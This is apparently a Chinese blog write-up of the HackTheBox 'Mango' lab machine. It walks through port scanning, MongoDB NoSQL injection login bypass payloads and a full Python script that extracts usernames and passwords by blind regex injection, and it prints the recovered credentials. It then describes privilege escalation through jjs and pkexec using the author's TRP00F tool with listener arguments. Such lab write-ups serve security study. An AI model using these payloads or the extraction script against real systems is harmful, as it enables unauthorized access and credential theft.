[Meachines] [Medium] Mango PHP弱比较绕过+MongoDB注入+TRP00F自动化权限提升+JJS权限提升

于 2024-08-11 20:17:04 发布
阅读量140 收藏 4
点赞数 2
分类专栏: HackTheBox 文章标签: php mongodb 自动化
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141110883
版权

信息收集

IP AddressOpening Ports
10.10.10.162TCP:22,80,443

$ nmap -p- 10.10.10.162 --min-rate 1000 -sC -sV

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.29 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Mango | Search Base
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

MongoDB 注入

# echo '10.10.10.162 mango.htb staging-order.mango.htb'>>/etc/hosts

image.png

staging-order.mango.htb

image-1.png

注入引号不会返回错误或改变响应。由于网站运行的是 PHP,我们可以尝试通过类型转换绕过认证。这可以通过在请求参数中添加 [] 来实现,使 PHP 将这些参数作为数组处理。如果存在某种弱比较,这将绕过认证。

image-2.png

然而,这次尝试也失败了。接下来,我们可以尝试 NoSQL 注入攻击,比如 MongoDB 认证绕过。MongoDB 使用 $ne(不等于)运算符来比较值。这个运算符可以通过数组语法传递给 PHP,最终注入到 MongoDB 查询中。

示例:

db.users.find({ username: “admin”, password: “admin” });

注入payload为

db.users.find({ username: "admin", password: {$ne:"admin"} });

username=admin&password[$ne]=admin&login=login

重定向到home.php页面

image-3.png

由于首页没有返回任何有用的信息,我们可以尝试使用 MongoDB 的 $regex 运算符从数据库中提取数据。$regex 运算符允许通过正则表达式来查找数据。例如,以下查询将搜索匹配正则表达式 a.* 的用户名,这个正则表达式匹配任何包含字母 a 的用户名:

db.users.find({username: { $regex : "a.*", password: { $ne : "admin" } });

username[$regex]=a.*&password[$ne]=admin&login=login

image-4.png

username[$regex]=1.*&password[$ne]=admin&login=login

image-5.png

# exp.py
# @Maptnh
import re
from requests import post
from string import ascii_lowercase, ascii_uppercase, digits, punctuation

url = 'http://staging-order.mango.htb/'

class Colors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

def get_characters():
    """Identify potential username and password characters."""
    charset = ascii_lowercase + ascii_uppercase + digits
    found_chars = []

    for char in charset:
        response = post(url, data={
            'username[$regex]': f'^{char}.*',
            'password[$ne]': 'password',
            'login': 'login'
        }, allow_redirects=False)
        if response.status_code == 302:
            found_chars.append(char)
            print(f"{Colors.OKGREEN}[+] Found character: {char}{Colors.ENDC}")

    return found_chars

def build_usernames(chars):
    """Build usernames from identified characters."""
    print(f"{Colors.WARNING}[*] Building usernames...{Colors.ENDC}")
    charset = ascii_lowercase + ascii_uppercase + digits
    usernames = []

    for char in chars:
        username = char
        while True:
            found_char = False
            for next_char in charset:
                regex = f'^{username + next_char}.*'
                response = post(url, data={
                    'username[$regex]': regex,
                    'password[$ne]': 'password',
                    'login': 'login'
                }, allow_redirects=False)
                if response.status_code == 302:
                    username += next_char
                    found_char = True
                    print(f"{Colors.OKGREEN}[+] Found character '{next_char}' for username: {username}{Colors.ENDC}")
                    break

            if not found_char:
                break
        
        usernames.append(username)
        print(f"{Colors.OKGREEN}[+] Found username: {username}{Colors.ENDC}")

    return usernames

def escape_special_characters(s):
    """Escape special characters in the string for regex."""
    return re.escape(s)

def find_passwords(usernames):
    """Attempt to find passwords for each identified username."""
    print(f"{Colors.WARNING}[*] Finding passwords for users...{Colors.ENDC}")
    charset = ascii_lowercase + ascii_uppercase + digits + punctuation
    results = []

    for user in usernames:
        password = ''
        while True:
            found_char = False
            for char in charset:
                escaped_password = escape_special_characters(password + char)
                response = post(url, data={
                    'username': user,
                    'password[$regex]': f'^{escaped_password}.*',
                    'login': 'login'
                }, allow_redirects=False)
                if response.status_code == 302:
                    password += char
                    found_char = True
                    print(f"{Colors.OKGREEN}[+] Found character '{char}' for password: {password}{Colors.ENDC}")
                    break

            if not found_char:
                break

        results.append((user, password))
        print(f"{Colors.OKGREEN}[+] Password found for user {user}: {password}{Colors.ENDC}")

    return results

def print_results(results):
    """Print the results in a table format."""
    print(f"{Colors.HEADER}\n[+] Final results:{Colors.ENDC}")
    print(f"{Colors.BOLD}{'Username':<20} {'Password':<20}{Colors.ENDC}")
    print(f"{'='*40}")
    for user, password in results:
        print(f"{user:<20} {password:<20}")

if __name__ == '__main__':
    chars = get_characters()
    usernames = build_usernames(chars)
    results = find_passwords(usernames)
    print_results(results)

$ python3 exp.py

Username             Password            
========================================
admin                t9KcS3>!0B#2        
mango                h3mXK8RhU~f{]f5H

image-6.png

$ ssh mango@mango.htb

image-7.png

$ su admin

User.txt

6fcde02686f818d7a13592d510c4867f

权限提升

JJS 权限提升 & TRP00F 权限提升

https://github.com/MartinxMax/trp00f

通过jjs权限提升

$ python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999

[!] Do you want to exploit the vulnerability in file jjs? (y/n) >y

[!] Do you want to exploit the vulnerability in file ‘pkexec’ ? (y/n) >n

image-11.png

也可以通过TRP00F其他的权限提升插件来直接获取ROOT权限

$ python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999

[!] Do you want to exploit the vulnerability in file jjs? (y/n) >n

[!] Do you want to exploit the vulnerability in file ‘pkexec’ ? (y/n) >y

image-10.png

Root.txt

110c3bcc1eb4a29e3da9c2e1d372c50d

Мартин.
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Node.js | Express+MongoDB 实现简易用户管理系统(二)(MVC架构 | 业务分层)
前端之行,任重道远!
11-09 6202
上一节我们使用Express和MongoDB初步搭建了简易用户管理系统的大致骨架,并实现了一些增删改查的功能,如果你还没看过上一篇请点击这里。这一节我们来解决上篇文章末尾指出的一个问题:业务代码混乱。解决方式就是使用MVC架构,使整体的业务分层,各司其职。
springmvc+mybatis+mongoDB
06-05
在IT行业中,构建高效、可扩展的Web应用是至关重要的,而Spring MVC、MyBatis和MongoDB这三者正是实现这一目标的强大工具。本文将深入探讨这些技术及其整合方式。 首先,Spring MVC是Spring框架的一部分,是一个...
【优质书籍推荐】Node.js+MongoDB+Vue.js全栈开发实战
weixin_43178406的博客
04-26 1万+
本文深入讲解了全栈开发巨作:《Node.js+MongoDB+Vue.js全栈开发实战》,希望能对学习全栈开发的同学们有所帮助。 文章目录 1. 前言 2. 书籍推荐 2.1 内容简介 2.2 本书作者 2.3 本书目录 2.4 适合读者 3. 购买链接
tornado+ansible+twisted+mongodb运维自动化系统开发(一)
美味小鱼的杂货铺
07-23 7932
前段时间学习了一下ansible的配置管理(http://blog.csdn.net/column/details/ansible.html   anisble配置工具翻译专栏),感觉很强大,就想着把最近看的tornado和twisted和它结合一下做一个webUI 今天动手做了一个demo,目前大概实现的功能是:添加ansible主机,然后单台运行脚本(后续会把playbook和批量运行加上)
基于Vue+Element+nodejs+Express+mongoDB社区综合治理管理系统
saber的博客
07-02 4446
该系统是博主的大四毕业设计的最后成品,基本实现了一个社区综合治理管理系统的基本功能,能实现社区工作人员对社区的高效管理与治理。所有系统用户均能共享系统数据,并且能对网格员完成任务的质量进行有效的监管。 该社区管理系统分前端和后端两个部分进行实现,实现了前后端分离。该项目已经放到了github上,需要的可以自行拉取。 前端代码github地址:https://github.com/saberla/communityManage 后端代码github地址:https://github.com/saberla/c
SpringBoot+MongoDB实现一个物流订单系统
bigsai
09-27 1万+
课程导学 我们都知道MongoDB是一款非常出色的非关系型文档数据库,你肯定会想问MongoDB这么强,我们该怎么用呢? MongoDB的应用场景非常多,无论是数据存储,日志存储越来越多的公司在使用MongoDB,而我们今天也在Springboot基础上使用MongoDB实现一个简易版本的物流订单系统。 在使用前,你自己的电脑上要有IDEA编译器来创建项目,还要拥有MongoDB数据库和Studio 3T(MongoDB可视化数据库管理工具)。 案例分析 我想,大部分人都应该有着购物的经历,当商品下单时就会
tornado+ansible+twisted+mongodb运维自动化系统开发(三)
美味小鱼的杂货铺
07-26 4382
tornado+ansible+twisted+mongodb运维自动化系统开发(三)
快速搭建基于VUE + EXPRESS + MONGODB架构系统
新兴IT民工的专栏
05-19 1万+
@TOC快速搭建基于VUE + EXPRESS + MONGODB架构系统 一. 前言 当前基于NodeJs框架的全栈工程实践非常之火,作为一个很长时间未接触代码的前程序猿。一直有点手痒痒,想尝试一下这种全新的编程体验,于是就重新开始了填坑的不归之路。 首先, 二. 工具准备 nodejs安装,git安装,mongodb安装 三. vue部分 撤销:Ctrl/Command + Z 重做:Ctrl/Command + Y 加粗:Ctrl/Command + B 斜体:Ctrl/Command + I
面试题(18)蚂蚁中间件团队面试题:Netty+Redis+Kafka+MongoDB+分布式
热门推荐
cowbin2012的专栏
04-30 1万+
蚂蚁中间件一面: 自我介绍 JVM垃圾回收算法和垃圾回收器有哪些,最新的JDK采用什么算法。 新生代和老年代的回收机制。 讲一下ArrayList和linkedlist的区别,ArrayList与HashMap的扩容方式。 Concurrenthashmap1.8后的改动。 Java中的多线程,以及线程池的增长策略和拒绝策略了解么。 Tomcat的类加载器了解么 Spring的ioc和aop,S...
springboot+mongodb整合+事务
qq_43633503的博客
05-09 5060
springboot 是我们java开发界的老牌开发框架,csdn上有一些基础的增删改查的教程详细但是不是很全,我自己再整合boot+mongodb的时候发现有些方法已经过时,或者是即将废弃的方法。 特总结如下 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-data-mongodb&
SpringBoot+MongoDB查询操作(MongoTemplate)总结
qq_45690493的博客
08-12 7088
SpringBoot+MangoDB查询操作(MongoTemplate)总结
VUE+ElementUI+Node+Koa+mongodb前后端权限管理系统模板
08-17
Vue.js 是一款流行的前端JavaScript框架,它以组件化开发、轻量级和高效著称。在本项目中,Vue.js 版本为2.6.11,这是一款稳定的版本,支持虚拟DOM、响应式数据绑定、单向数据流以及一系列优化手段,如懒加载、异步...
koa-mongo_node+mongoDB实现登录_loadh2h_koamongo_MongoDB_
09-29
`Koa`是Express作者开发的一个新一代的Node.js Web框架,它提供了更现代的API和更好的错误处理机制,而`MongoDB`则是一种流行的NoSQL数据库,适合存储非结构化数据。 1. **Koa框架**: Koa的核心在于它的中间件...
node+vue+element+mongodb的 资金权限管理系统.zip
08-01
基于node js、vue、mongodb等技术构建的web系统,界面美观,功能齐全,适合用作毕业设计、课程设计作业等,项目均经过测试,可快速部署运行! 基于node js、vue、mongodb等技术构建的web系统,界面美观,功能齐全,...
mysql+mongodb+可视化界面 .msi可执行包
08-04
数据库是以一定方式储存在一起、能与多个用户共享、具有尽可能小的冗余度、与应用程序彼此独立的数据集合,可视为电子化的文件柜——存储电子文件的处所,用户可以对文件中的数据进行新增、查询、更新、删除等操作,...
LNMP环境搭建论坛
qq_63652578的博客
08-07 981
root@Rocky8-node1 ~]# mv upload/* /usr/share/nginx/html/ #把upload下的所有内容移动到/usr/share/nginx/html/[root@Rocky8-node1 ~]# sed -i '/^group =/ c \group = nginx' /etc/php-fpm.d/www.conf #将组改为nginx。
[FSCTF 2023]细狗2.0
最新发布
2301_81462177的博客
08-09 268
cmd=ls${lFS}-1剁FSS9-后面加个$与{类似,起截断作用,$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以,看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1376
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
ctfhub文件包含
a666666688的博客
08-07 491
文件的内容,通常这个文件包含一些敏感信息,比如CTF比赛中的flag。这样就可以通过浏览器或其他HTTP客户端看到。,直接访问这个URL将导致服务器读取并返回。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值